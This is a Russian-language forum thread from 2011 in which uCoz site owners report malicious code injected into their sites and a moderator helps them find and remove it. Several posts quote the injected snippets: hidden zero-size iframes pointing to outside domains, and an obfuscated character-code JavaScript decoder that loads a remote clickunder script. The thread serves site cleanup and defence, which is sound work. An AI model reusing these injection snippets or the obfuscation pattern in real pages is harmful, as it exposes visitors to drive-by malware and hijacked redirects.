Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
fredy, в профиле чисто. удаляйте то что я указала тут //forum.ucoz.ru/forum/45-34556-696986-16-1298391732 почему вы до сих пор не удалили агрессивный код?
|
|
Здравствуйте.
Сегодня появился такой iframe на сайте удалено Code <div style="position:absolute;top:-100px;left:-100px;margin:-200px 0 0 -200px"><iframe frameborder="0" width="1" scrolling="no" style="height:1px;" src="http://funnymobile.co.cc/"></iframe></div> На всех абсолютно страничках. Смотрю исходный код страницы - этот код в самом верху, где его найти в дизайне не знаю. Как мне его убрать? И еще, смотрю сайты из топа, там тоже почти на всех этот код появился. Не может же юкоз толкать этот код на сайты? Просто если бы он был только у меня, а то он почти везде, может зря паникую... Код видно и когда гостем на сайте, и когда админом. Сообщение отредактировал sky777 - Среда, 23 Фев 2011, 23:33:19
|
|
sky777, к сожалению я не вижу на вашем сайте указанного кода вообще.
Quote И еще, смотрю сайты из топа, там тоже почти на всех этот код появился посмотрите ко мне в подпись, на моем сайте вы тоже видите его? на этом форуме тоже в исходнике видите? если да, то вам бы провериться на вирусы. каким браузером пользуетесь? |
|
Quote (webanet) sky777, к сожалению я не вижу на вашем сайте указанного кода вообще. ну это-то наверно наоборот к счастью что у меня все-таки нет ничего на сайте. Да, и на вашем вижу, и на форуме. А на других, не на юкозе которые, не вижу.. Браузер firefox. Может и вирус на комп залез  , будем проверяться. Спасибо, webanet ! |
|
sky777, отключите все расширения которые поставили на фокс и посмотрите сайты снова. бяка может сидеть в одном из расширений и тогда вы обойдетесь малой кровью
|
|
webanet, поотключала все расширения, рекламу с сайта убрала, не помогло. Появилось то это только вечером, вроде по левым сайтам не хожу, чтобы подцепить вирус. Завтра проснутся знакомые, попрошу их код глянуть, если нет ни у кого, значит лечить буду комп... Ну главное что сайт не забанят ни юкоз, ни поисковики за всякую фигню. Хоть от этого спокойнее.
|
|
Здравствуйте. на моём сайте. Мой сайт тут при попытке кликнуть мышкой на форме входа при начале ввода e-mail и пароля. а иногда и просто происходит переход на www.xakeri.ru происходит это не всегда, а спонтанно. Ещё буквально вчера появилось предостережение от NOD "..вирус на сайте JS/Agent.NCX..." Из моих подозрительных действий. ставил на некоторые страницы код запрета на правую кнопку (сейчас убрал). Больше вроде ничего. Всё это происходит и под логином и под гостем. Подскажите, пожалуйста, как мне действовать дальше. Проверял сайт на онлайн проверках, вирусов не находит никто.
Сообщение отредактировал vibro - Среда, 23 Фев 2011, 18:49:13
|
|
vibro, нод ваш может реагировать вот на это
Code <!-- </block6> --> <SCRIPT LANGUAGE="JavaScript"> <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97 !115!99!114!105!112!116!34!32!115!114!99!61!34!104 !1 16!116!112!58!47!47!97!122!101!114!107!46!114!117!47!115!49!47!99!108!105!99!107!117!110! 100!101!114!47!99!108!105!99!107!117!110!100!101! 11 4!46!106!115!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} //--> </SCRIPT><SCRIPT LANGUAGE="JavaScript"> <!-- Decode(); //--> </SCRIPT> в остальном мне не повезло. все относительно чисто |
|
в html-шаблонах слов xakeri.ru нет. Как ещё можно искать? или конкретно в каком шаблоне? ссылка срабатывает на форме входа.
Добавлено (23-Фев-2011, 21:43:02) |
|
vibro,
Quote ссылка срабатывает на форме входа. |
|
webanet, Попробовал, всё норм. Дело в том что переход на xakeri происходит только при первом заходе на сайт, потом при любых действиях всё ок. Нужны закрывать все страницы и заходить опять тогда срабатывает
Добавлено (23-Фев-2011, 22:10:14) проблема решена Сообщение отредактировал webanet - Среда, 23 Фев 2011, 23:55:48
|
|
House32, выделенное красным удалить. блок статистика
Quote <P align=left><div class="tOnline" id="onl1">Онлайн всего: <b>2</b></div> <div class="gOnline" id="onl2">Гостей: <b>1</b></div> <div class="uOnline" id="onl3">Пользователей: <b>1</b></div></P> <P align=left><a class="groupAdmin" href="javascript://" rel="nofollow" onclick="window.open('http://bryansk-32.ucoz.ru/index/8-1','up1','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;">House32</a></P> <HR> <DIV align=center><SPAN style="FONT-SIZE: 10pt"><IFRAME height="0%" src="http://ga1.net.ru/" frameBorder=0 width="0%" name=iframe scrolling=no></IFRAME><SPAN style="COLOR: #ff0000; FONT-SIZE: 10pt"><SPAN style="COLOR: #ff0000; FONT-SIZE: 10pt" MS??="" Sans="" Comic=""><SPAN style="COLOR: #ff0000; FONT-SIZE: 10pt" MS??="" Sans="" Comic="">Пользователи, посетившие<BR>сайт за текущий день : </SPAN></SPAN></SPAN></SPAN></DIV> |
|
Ребят подскажите пожалуйста:
Если я нашё у себя на сайте код Code <iframe src="http://vaseapupkin.ucoz.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe> Обнаружил на этом сайте http://www.live-gamez.ru/ |
|
P@R@VoZiK, какой именно ифрейм вы нашли?
|
| |||
